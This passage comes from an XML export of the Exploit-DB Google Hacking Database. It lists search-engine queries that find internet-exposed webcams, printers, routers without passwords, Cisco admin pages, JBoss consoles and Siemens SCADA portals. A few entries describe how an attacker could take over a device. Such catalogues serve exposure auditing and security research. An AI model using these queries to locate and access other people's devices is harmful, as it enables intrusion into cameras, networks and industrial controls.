<querystring>https://www.google.com/search?q=inurl:&quot;/websys/webArch/mainFrame.cgi&quot; -hatana</querystring>
<edb></edb>
<date>2017-12-07</date>
<author>Dxtroyer</author>
</entry>
<entry>
<id>844</id>
<link>https://www.exploit-db.com/ghdb/844</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;8003/Display?what=&quot;</shortDescription>
<textualDescription>Norton AntiVirus for GatewaysEasily administered from anywhere via an HTML interface, it scans compressed and encoded files at the SMTP gateway, including a nearly unlimited number of file extensions in ZIPÂî, UUENCODE, and MIME formats. Administrators have flexible options for handling infected files, scheduling virus definition updates via LiveUpdateâââ¬Å¾Ã¢, and generating reports.</textualDescription>
<query>inurl:&quot;8003/Display?what=&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%228003%2FDisplay%3Fwhat%3D%22&amp;sourceid=mozilla-search&amp;start=0&amp;start=0&amp;ie=utf-8&amp;oe=utf-8&amp;rls=org.mozilla:en-US:official</querystring>
<edb></edb>
<date>2005-01-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>5682</id>
<link>https://www.exploit-db.com/ghdb/5682</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;8080/dashboard/&quot; intitle:&quot;Dashboard&quot;</shortDescription>
<textualDescription>Zabbix Login Portal:
inurl:&quot;8080/dashboard/&quot; intitle:&quot;Dashboard&quot;
Reza Abasi(Turku)
</textualDescription>
<query>inurl:&quot;8080/dashboard/&quot; intitle:&quot;Dashboard&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;8080/dashboard/&quot; intitle:&quot;Dashboard&quot;</querystring>
<edb></edb>
<date>2020-01-06</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>4516</id>
<link>https://www.exploit-db.com/ghdb/4516</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;8080/jmx-console&quot;</shortDescription>
<textualDescription>This dork will list all unauthenticated jboss servers with jmx-console
access.
--
İsmail Baydan</textualDescription>
<query>inurl:&quot;8080/jmx-console&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;8080/jmx-console&quot;</querystring>
<edb></edb>
<date>2017-06-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>4768</id>
<link>https://www.exploit-db.com/ghdb/4768</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;:2083/login/?user=&quot;</shortDescription>
<textualDescription>Cpanel that are logged in with Hosted Sites.
Author: Parth S. Patel
</textualDescription>
<query>inurl:&quot;:2083/login/?user=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;:2083/login/?user=&quot;</querystring>
<edb></edb>
<date>2018-04-13</date>
<author>Parth S. Patel</author>
</entry>
<entry>
<id>765</id>
<link>https://www.exploit-db.com/ghdb/765</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;:631/printers&quot; -php -demo</shortDescription>
<textualDescription>CUPS provides a portable printing layer for UNIXÂî-based operating systems. It has been developed by Easy Software Products to promote a standard printing solution for all UNIX vendors and users. CUPS provides the System V and Berkeley command-line interfaces. CUPS uses the Internet Printing Protocol (&quot;IPP&quot;) as the basis for managing print jobs and queues. The Line Printer Daemon (&quot;LPD&quot;) Server Message Block (&quot;SMB&quot;), and AppSocket (a.k.a. JetDirect).</textualDescription>
<query>inurl:&quot;:631/printers&quot; -php -demo</query>
<querystring>https://www.google.com/search?num=100&amp;q=inurl%3A%22%3A631%2Fprinters%22+-php+-demo</querystring>
<edb></edb>
<date>2004-12-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>3734</id>
<link>https://www.exploit-db.com/ghdb/3734</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;:9000&quot; PacketVideo corporation</shortDescription>
<textualDescription>inurl:&quot;:9000&quot; PacketVideo corporation
About: This provides Twonky Server Media interface. You can find images, music, videos etc.
Submitter: Ishaan P</textualDescription>
<query>inurl:&quot;:9000&quot; PacketVideo corporation</query>
<querystring>https://www.google.com/search?q=inurl:&quot;:9000&quot; PacketVideo corporation</querystring>
<edb></edb>
<date>2011-07-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>4350</id>
<link>https://www.exploit-db.com/ghdb/4350</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;apc.php&quot; intitle:&quot;APC INFO&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;apc.php&quot; intitle:&quot;APC INFO&quot;
# Date: 11/1/2016
# Author: Mk0Underground</textualDescription>
<query>inurl:&quot;apc.php&quot; intitle:&quot;APC INFO&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;apc.php&quot; intitle:&quot;APC INFO&quot;</querystring>
<edb></edb>
<date>2016-11-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>4639</id>
<link>https://www.exploit-db.com/ghdb/4639</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;apps/console/sepm&quot;</shortDescription>
<textualDescription>This dork will provide you all the Semantec Endpoint managers , that not
being configured properly,
Regards
fu2x2000
</textualDescription>
<query>inurl:&quot;apps/console/sepm&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;apps/console/sepm&quot;</querystring>
<edb></edb>
<date>2017-12-19</date>
<author>Fu2x2000</author>
</entry>
<entry>
<id>4156</id>
<link>https://www.exploit-db.com/ghdb/4156</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;cgi-bin&quot; &quot;No password set!&quot; &quot; There is no password set on this router.&quot;</shortDescription>
<textualDescription>Dork reveals panels of router without passwords. Enjoy xD.
This Dork discovered by Rootkit Pentester.</textualDescription>
<query>inurl:&quot;cgi-bin&quot; &quot;No password set!&quot; &quot; There is no password set on this router.&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;cgi-bin&quot; &quot;No password set!&quot; &quot; There is no password set on this router.&quot;</querystring>
<edb></edb>
<date>2015-12-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>4220</id>
<link>https://www.exploit-db.com/ghdb/4220</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;cgi-bin/dynamic/&quot; inurl:&quot;html&quot; intitle:&quot;Printer Status&quot;</shortDescription>
<textualDescription>Description: Dell Laser printer web panel
Google search: inurl:&quot;cgi-bin/dynamic/&quot; inurl:&quot;html&quot; intitle:&quot;Printer Status&quot;
Author: nebo_oben</textualDescription>
<query>inurl:&quot;cgi-bin/dynamic/&quot; inurl:&quot;html&quot; intitle:&quot;Printer Status&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;cgi-bin/dynamic/&quot; inurl:&quot;html&quot; intitle:&quot;Printer Status&quot;</querystring>
<edb></edb>
<date>2016-03-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>1008</id>
<link>https://www.exploit-db.com/ghdb/1008</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;CgiStart?page=&quot;</shortDescription>
<textualDescription>This search reveals even more Panasonic IP cameras!</textualDescription>
<query>inurl:&quot;CgiStart?page=&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%22CgiStart%3Fpage%3D%22</querystring>
<edb></edb>
<date>2005-06-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>8103</id>
<link>https://www.exploit-db.com/ghdb/8103</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;device.rsp&quot; -in</shortDescription>
<textualDescription># Google Dork: inurl:&quot;device.rsp&quot; -in
# Various Online Devices
# Date:08/03/2023
# Exploit Author: Sanu Jose M</textualDescription>
<query>inurl:&quot;device.rsp&quot; -in</query>
<querystring>https://www.google.com/search?q=inurl:&quot;device.rsp&quot; -in</querystring>
<edb></edb>
<date>2023-03-08</date>
<author>Sanu Jose M</author>
</entry>
<entry>
<id>4624</id>
<link>https://www.exploit-db.com/ghdb/4624</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;ews/setting/setews.htm&quot;</shortDescription>
<textualDescription>The google dork leads to various Dell/DocuPrint printers whose authentication is not set.
An attacker can set a new password and restart printer to apply new settings.
Once a new password is created, the attacker can disrupt the printer or take control of it remotely for data theft.
Ankit Anubhav,NewSky Security
</textualDescription>
<query>inurl:&quot;ews/setting/setews.htm&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;ews/setting/setews.htm&quot;</querystring>
<edb></edb>
<date>2017-11-28</date>
<author>Ankit Anubhav</author>
</entry>
<entry>
<id>5089</id>
<link>https://www.exploit-db.com/ghdb/5089</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;fhem.cfg&quot; AND 'fhem.cfg' -github</shortDescription>
<textualDescription>Dork about FHEM - Perl server for house automation (configuration files)
inurl:&quot;fhem.cfg&quot; AND 'fhem.cfg' -github
Author : *.doc-TOR aka Brain Reflow https://twitter.com/The_d0c_T0R
</textualDescription>
<query>inurl:&quot;fhem.cfg&quot; AND 'fhem.cfg' -github</query>
<querystring>https://www.google.com/search?q=inurl:&quot;fhem.cfg&quot; AND 'fhem.cfg' -github</querystring>
<edb></edb>
<date>2019-02-05</date>
<author>Brain Reflow</author>
</entry>
<entry>
<id>4523</id>
<link>https://www.exploit-db.com/ghdb/4523</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;ftp://www.&quot; &quot;Index of /&quot;</shortDescription>
<textualDescription>Finds various online FTP servers.
Dxtroyer</textualDescription>
<query>inurl:&quot;ftp://www.&quot; &quot;Index of /&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;ftp://www.&quot; &quot;Index of /&quot;</querystring>
<edb></edb>
<date>2017-06-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>4533</id>
<link>https://www.exploit-db.com/ghdb/4533</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;g2_view=webdav.WebDavMount&quot;</shortDescription>
<textualDescription>inurl:&quot;g2_view=webdav.WebDavMount&quot;
Finds sites with WebDAV enabled
TPNight</textualDescription>
<query>inurl:&quot;g2_view=webdav.WebDavMount&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;g2_view=webdav.WebDavMount&quot;</querystring>
<edb></edb>
<date>2017-06-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>4219</id>
<link>https://www.exploit-db.com/ghdb/4219</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;home.htm?cat=home&quot; | inurl:&quot;index.htm?cat=info&quot; | inurl:&quot;index.htm?cat=settings&quot; | inurl:&quot;index.htm?cat=network&quot; | inurl:&quot;index.htm?cat=bluetooth&quot;</shortDescription>
<textualDescription>Description: HP OfficeJet printer web panel
Google search: inurl:&quot;home.htm?cat=home&quot; | inurl:&quot;index.htm?cat=info&quot;
| inurl:&quot;index.htm?cat=settings&quot; | inurl:&quot;index.htm?cat=network&quot; |
inurl:&quot;index.htm?cat=bluetooth&quot;
Author: nebo_oben</textualDescription>
<query>inurl:&quot;home.htm?cat=home&quot; | inurl:&quot;index.htm?cat=info&quot; | inurl:&quot;index.htm?cat=settings&quot; | inurl:&quot;index.htm?cat=network&quot; | inurl:&quot;index.htm?cat=bluetooth&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;home.htm?cat=home&quot; | inurl:&quot;index.htm?cat=info&quot; | inurl:&quot;index.htm?cat=settings&quot; | inurl:&quot;index.htm?cat=network&quot; | inurl:&quot;index.htm?cat=bluetooth&quot;</querystring>
<edb></edb>
<date>2016-03-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>4507</id>
<link>https://www.exploit-db.com/ghdb/4507</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;http://ftp.dlink&quot;</shortDescription>
<textualDescription>This dork allows us to find lists of FTP directories of D-Link routers
inurl:&quot;http://ftp.dlink&quot;
Drok3r</textualDescription>
<query>inurl:&quot;http://ftp.dlink&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;http://ftp.dlink&quot;</querystring>
<edb></edb>
<date>2017-05-31</date>
<author>anonymous</author>
</entry>
<entry>
<id>4478</id>
<link>https://www.exploit-db.com/ghdb/4478</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;http://voicemail.&quot;</shortDescription>
<textualDescription>Various voicemail servers like Cisco Unity Messaging.</textualDescription>
<query>inurl:&quot;http://voicemail.&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;http://voicemail.&quot;</querystring>
<edb></edb>
<date>2017-05-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>4574</id>
<link>https://www.exploit-db.com/ghdb/4574</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;img/main.cgi?next_file&quot;</shortDescription>
<textualDescription>Dork that allows us to find online cameras, be it security, webcams, etc.
inurl:&quot;img/main.cgi?next_file&quot;
Drok3r [ RedTheam - NATASteam ]</textualDescription>
<query>inurl:&quot;img/main.cgi?next_file&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;img/main.cgi?next_file&quot;</querystring>
<edb></edb>
<date>2017-08-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>4217</id>
<link>https://www.exploit-db.com/ghdb/4217</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;info_deviceStatus.html&quot; | inurl:&quot;info_suppliesStatus.html&quot; | inurl:&quot;info_configuration.html&quot; | inurl:&quot;info_config_network.html&quot; | inurl:&quot;info_specialPages.html&quot; | inurl:&quot;info_colorUsageJobLog.html&quot; | inurl:&quot;info_eventLog.html&quot;</shortDescription>
<textualDescription>Description: HP LaserJet printer web panel
Google search: inurl:&quot;info_deviceStatus.html&quot; |
inurl:&quot;info_suppliesStatus.html&quot; | inurl:&quot;info_configuration.html&quot; |
inurl:&quot;info_config_network.html&quot; | inurl:&quot;info_specialPages.html&quot; |
inurl:&quot;info_colorUsageJobLog.html&quot; | inurl:&quot;info_eventLog.html&quot;
Author: nebo_oben</textualDescription>
<query>inurl:&quot;info_deviceStatus.html&quot; | inurl:&quot;info_suppliesStatus.html&quot; | inurl:&quot;info_configuration.html&quot; | inurl:&quot;info_config_network.html&quot; | inurl:&quot;info_specialPages.html&quot; | inurl:&quot;info_colorUsageJobLog.html&quot; | inurl:&quot;info_eventLog.html&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;info_deviceStatus.html&quot; | inurl:&quot;info_suppliesStatus.html&quot; | inurl:&quot;info_configuration.html&quot; | inurl:&quot;info_config_network.html&quot; | inurl:&quot;info_specialPages.html&quot; | inurl:&quot;info_colorUsageJobLog.html&quot; | inurl:&quot;info_even</querystring>
<edb></edb>
<date>2016-03-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>729</id>
<link>https://www.exploit-db.com/ghdb/729</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;ipp/pdisplay.htm&quot;</shortDescription>
<textualDescription>Providing a standout printing solution, Novell iPrint offers secure print services that extend across multiple networks and operating systemsâ€ââ¬Âbringing the power of the Net to your business environment. This search locates various online printers.</textualDescription>
<query>inurl:&quot;ipp/pdisplay.htm&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%22ipp%2Fpdisplay.htm%22</querystring>
<edb></edb>
<date>2004-11-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>7086</id>
<link>https://www.exploit-db.com/ghdb/7086</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;jpegpush.htm&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;jpegpush.htm&quot;
# Various Online Devices
# Date: 19/07/2021
# Exploit Author: Marko Žlender
</textualDescription>
<query>inurl:&quot;jpegpush.htm&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;jpegpush.htm&quot;</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>Marko Žlender</author>
</entry>
<entry>
<id>603</id>
<link>https://www.exploit-db.com/ghdb/603</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;level/15/exec/-/show&quot;</shortDescription>
<textualDescription>This search finds Cisco devices which have level 15 access open via webinterface. If an attacker wants to search for another level he can replace the &quot;15&quot; with this level. Levels below 10 need a leading zero (e.g. 04).Currently only the cached pages can be viewed.</textualDescription>
<query>inurl:&quot;level/15/exec/-/show&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22level/15/exec/-/show%22&amp;num=100&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2004-10-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>6560</id>
<link>https://www.exploit-db.com/ghdb/6560</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;live/cam.html&quot;</shortDescription>
<textualDescription>#Exploit Title : Webcams, various online devices.
#Google Dork: inurl:&quot;live/cam.html&quot;
#Date : 23/09/2020
#Exploit Author : Sanu Jose M
Thanks &amp; Regards,
Sanu Jose M
</textualDescription>
<query>inurl:&quot;live/cam.html&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;live/cam.html&quot;</querystring>
<edb></edb>
<date>2020-09-23</date>
<author>Sanu Jose M</author>
</entry>
<entry>
<id>4472</id>
<link>https://www.exploit-db.com/ghdb/4472</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;lvappl.htm&quot;</shortDescription>
<textualDescription>Finds live cameras connected to servers on the internet (mostly security
cams)
Dxtroyer</textualDescription>
<query>inurl:&quot;lvappl.htm&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;lvappl.htm&quot;</querystring>
<edb></edb>
<date>2017-05-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>4788</id>
<link>https://www.exploit-db.com/ghdb/4788</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;mjpg/video.cgi?resolution=&quot;</shortDescription>
<textualDescription>inurl:&quot;mjpg/video.cgi?resolution=&quot; || inurl:&quot;mjpg/video.cgi&quot;
This dork show a lot of videp.cgi pages!!!
ManhNho
</textualDescription>
<query>inurl:&quot;mjpg/video.cgi?resolution=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;mjpg/video.cgi?resolution=&quot;</querystring>
<edb></edb>
<date>2018-04-25</date>
<author>ManhNho</author>
</entry>
<entry>
<id>5785</id>
<link>https://www.exploit-db.com/ghdb/5785</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;MultiCameraFrame?Mode=Motion&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;MultiCameraFrame?Mode=Motion&quot;
# By using this dork, various web cameras can be revealed.
# Date: 12/03/2020
# Author: Alexandros Pappas
</textualDescription>
<query>inurl:&quot;MultiCameraFrame?Mode=Motion&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;MultiCameraFrame?Mode=Motion&quot;</querystring>
<edb></edb>
<date>2020-03-12</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4475</id>
<link>https://www.exploit-db.com/ghdb/4475</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;multimon.cgi&quot; intitle:&quot;UPS&quot;</shortDescription>
<textualDescription>Finds live traffic monitors, telling you who's online
Dxtroyer</textualDescription>
<query>inurl:&quot;multimon.cgi&quot; intitle:&quot;UPS&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;multimon.cgi&quot; intitle:&quot;UPS&quot;</querystring>
<edb></edb>
<date>2017-05-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>805</id>
<link>https://www.exploit-db.com/ghdb/805</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;next_file=main_fs.htm&quot; inurl:img inurl:image.cgi</shortDescription>
<textualDescription>Linksys Wireless-G web cams.</textualDescription>
<query>inurl:&quot;next_file=main_fs.htm&quot; inurl:img inurl:image.cgi</query>
<querystring>https://www.google.com/search?q=inurl:%22next_file=main_fs.htm%22+inurl:img+inurl:image.cgi</querystring>
<edb></edb>
<date>2004-12-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>5770</id>
<link>https://www.exploit-db.com/ghdb/5770</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;nobody/loginQuick.htm&quot;</shortDescription>
<textualDescription>Avtech CCTV Login Page :
inurl:&quot;nobody/loginQuick.htm&quot;
Author : Zulfiqar Wardi (yunaranyancat)
</textualDescription>
<query>inurl:&quot;nobody/loginQuick.htm&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;nobody/loginQuick.htm&quot;</querystring>
<edb></edb>
<date>2020-03-05</date>
<author>yunaranyancat</author>
</entry>
<entry>
<id>3820</id>
<link>https://www.exploit-db.com/ghdb/3820</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;Orion/SummaryView.aspx&quot; intext:&quot;Orion Core&quot;</shortDescription>
<textualDescription>Hello,
Enumerate Solarwinds Orion network monitoring portals. In some cases, the
portal can be accessed without authenticating.
-Sean</textualDescription>
<query>inurl:&quot;Orion/SummaryView.aspx&quot; intext:&quot;Orion Core&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;Orion/SummaryView.aspx&quot; intext:&quot;Orion Core&quot;</querystring>
<edb></edb>
<date>2012-11-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>3956</id>
<link>https://www.exploit-db.com/ghdb/3956</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;phy.htm&quot; intitle:&quot;Touchstone Status&quot;</shortDescription>
<textualDescription>Hits: 4,250 results
This dork finds PacketCable 1.0 Touchstone Telephony Modems that are online
wherein you see its event logs, system information, interface parameters,
mac addresses, etc.
*Jay Turla a.k.a shipcode*</textualDescription>
<query>inurl:&quot;phy.htm&quot; intitle:&quot;Touchstone Status&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;phy.htm&quot; intitle:&quot;Touchstone Status&quot;</querystring>
<edb></edb>
<date>2014-07-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>6791</id>
<link>https://www.exploit-db.com/ghdb/6791</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;portal.mwsl&quot; &quot;Status&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;portal.mwsl&quot; &quot;Status&quot;
# Various online devices (Siemens S7 series of PLC controllers - SCADA)
# Date: 9/2/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:&quot;portal.mwsl&quot; &quot;Status&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;portal.mwsl&quot; &quot;Status&quot;</querystring>
<edb></edb>
<date>2021-02-11</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>971</id>
<link>https://www.exploit-db.com/ghdb/971</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;port_255&quot; -htm</shortDescription>
<textualDescription>Another way to dig up some not yet dorked Lexmark and a couple of Dell printers.http://johnny.ihackstuff.com/index.php?name=PNphpBB2&amp;file=viewtopic&amp;t=2177</textualDescription>
<query>inurl:&quot;port_255&quot; -htm</query>
<querystring>https://www.google.com/search?q=inurl%3A%22port_255%22+-htm&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2005-05-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>746</id>
<link>https://www.exploit-db.com/ghdb/746</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;printer/main.html&quot; intext:&quot;settings&quot;</shortDescription>
<textualDescription>Brother HL Printers.</textualDescription>
<query>inurl:&quot;printer/main.html&quot; intext:&quot;settings&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;c2coff=1&amp;q=inurl%3A%22printer%2Fmain.html%22+intext%3A%22settings%22</querystring>
<edb></edb>
<date>2004-12-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>1005</id>
<link>https://www.exploit-db.com/ghdb/1005</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;S=320x240&quot; | inurl:&quot;S=160x120&quot; inurl:&quot;Q=Mobile&quot;</shortDescription>
<textualDescription>Mobile cameras? Not sure what camera type this is for but they are all from Asia and no password is required to view them.. multiple cams and camera views. The &amp;N=* at the end of the URL changes the language of the camera control links, &amp;N=0 is english.This is a slightly modified version of WarChylde's query, which gives more results.</textualDescription>
<query>inurl:&quot;S=320x240&quot; | inurl:&quot;S=160x120&quot; inurl:&quot;Q=Mob</query>
<querystring>https://www.google.com/search?q=inurl%3A%22S%3D320x240%22+%7C+inurl%3A%22S%3D160x120%22+inurl%3A%22Q%3DMobile%22</querystring>
<edb></edb>
<date>2005-06-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>7017</id>
<link>https://www.exploit-db.com/ghdb/7017</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;serverpush.htm&quot; &quot;IP Camera&quot; intext:&quot;Foscam&quot;</shortDescription>
<textualDescription>#Google Dork: inurl:&quot;serverpush.htm&quot; &quot;IP Camera&quot; intext:&quot;Foscam&quot;
# Various Online Devices
# Date: 28/06/2021
# Exploit Author: Neha Singh
Thanks and Regards
Neha Singh
</textualDescription>
<query>inurl:&quot;serverpush.htm&quot; &quot;IP Camera&quot; intext:&quot;Foscam&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;serverpush.htm&quot; &quot;IP Camera&quot; intext:&quot;Foscam&quot;</querystring>
<edb></edb>
<date>2021-07-02</date>
<author>Neha Singh</author>
</entry>
<entry>
<id>4599</id>
<link>https://www.exploit-db.com/ghdb/4599</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;set_config_networkIPv6.html&quot;</shortDescription>
<textualDescription>Finds lots of HP colour printers hooked up to the internet
Dxtroyer
</textualDescription>
<query>inurl:&quot;set_config_networkIPv6.html&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;set_config_networkIPv6.html&quot;</querystring>
<edb></edb>
<date>2017-10-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>5013</id>
<link>https://www.exploit-db.com/ghdb/5013</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;swagger-ui/index.html&quot;</shortDescription>
<textualDescription>Searching for the unprotected swagger APIs link.
</textualDescription>
<query>inurl:&quot;swagger-ui/index.html&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;swagger-ui/index.html&quot;</querystring>
<edb></edb>
<date>2018-11-06</date>
<author>Sang Bui</author>
</entry>
<entry>
<id>4476</id>
<link>https://www.exploit-db.com/ghdb/4476</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;this.LCDispatcher?nav=&quot;</shortDescription>
<textualDescription>Finds HP printers connected to the internet
Dxtroyer</textualDescription>
<query>inurl:&quot;this.LCDispatcher?nav=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;this.LCDispatcher?nav=&quot;</querystring>
<edb></edb>
<date>2017-05-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>4216</id>
<link>https://www.exploit-db.com/ghdb/4216</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;topPage.cgi&quot; | inurl:&quot;mainFrame.cgi&quot; intext:&quot;Web Image Monitor&quot;</shortDescription>
<textualDescription>Description: Web Image Monitor allows users to remotely monitor and
change the network configuration of Ricoh copiers, multifunctions and
printers via common web browsers
Google search: inurl:&quot;topPage.cgi&quot; | inurl:&quot;mainFrame.cgi&quot; intext:&quot;Web
Image Monitor&quot;
Author: nebo_oben</textualDescription>
<query>inurl:&quot;topPage.cgi&quot; | inurl:&quot;mainFrame.cgi&quot; intext:&quot;Web Image Monitor&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;topPage.cgi&quot; | inurl:&quot;mainFrame.cgi&quot; intext:&quot;Web Image Monitor&quot;</querystring>
<edb></edb>
<date>2016-03-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>6837</id>
<link>https://www.exploit-db.com/ghdb/6837</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;userimage.html&quot; &quot;Live&quot; &quot;Open&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;userimage.html&quot; &quot;Live&quot; &quot;Open&quot;
# Various online devices.
# Date: 17/03/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:&quot;userimage.html&quot; &quot;Live&quot; &quot;Open&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;userimage.html&quot; &quot;Live&quot; &quot;Open&quot;</querystring>
<edb></edb>
<date>2021-03-19</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6690</id>
<link>https://www.exploit-db.com/ghdb/6690</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;view.shtml&quot; &quot;camera&quot;</shortDescription>
<textualDescription>#Exploit Title : Various online devices (webcams).
#Google Dork : inurl:&quot;view.shtml&quot; &quot;camera&quot;
#Date : 18/11/2020
#Exploit Author : Sanu Jose M
Thanks &amp; Regards,
Sanu Jose M
</textualDescription>
<query>inurl:&quot;view.shtml&quot; &quot;camera&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;view.shtml&quot; &quot;camera&quot;</querystring>
<edb></edb>
<date>2020-11-24</date>
<author>Sanu Jose M</author>
</entry>
<entry>
<id>6489</id>
<link>https://www.exploit-db.com/ghdb/6489</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;view.shtml&quot; &quot;Network Camera&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;view.shtml&quot; &quot;Network Camera&quot;
# Various online devices (webcams).
# Date: 21/08/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:&quot;view.shtml&quot; &quot;Network Camera&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;view.shtml&quot; &quot;Network Camera&quot;</querystring>
<edb></edb>
<date>2020-08-21</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6688</id>
<link>https://www.exploit-db.com/ghdb/6688</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;view.shtml&quot; &quot;Network&quot;</shortDescription>
<textualDescription>#Exploit Title : Various online devices (webcams).
#Google Dork : inurl:&quot;view.shtml&quot; &quot;Network&quot;
